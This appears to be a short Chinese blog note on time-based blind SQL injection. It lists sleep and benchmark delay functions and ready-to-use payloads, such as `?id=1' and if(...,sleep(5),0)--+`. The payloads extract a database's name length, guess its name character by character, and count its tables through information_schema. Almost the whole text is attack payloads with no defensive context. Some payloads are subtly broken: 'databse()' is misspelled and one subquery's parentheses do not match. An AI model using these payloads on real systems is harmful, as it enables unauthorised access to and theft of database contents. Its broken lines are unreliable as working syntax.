3、布尔延时注入
延时函数
sleep(5); benchmark(50000000,sha1(1));
获取数据库名
长度 and if((length(databse())=8),sleep(5),0)--+ 逐字猜解 and if((substr(databse(),1,1)='s'),sleep(5),0)--+
判断该数据库有多少张表
select count(table_name) from information_schema.tables where table_schema=database() and if(((select count(table_name) from information_schema.tables where table_schema=database()=4),sleep(5),0)--+ ?id=1' and if(((select count(table_name) from information_schema.tables where table_schema=database())=4),sleep(5),0)--+
浙公网安备 33010602011771号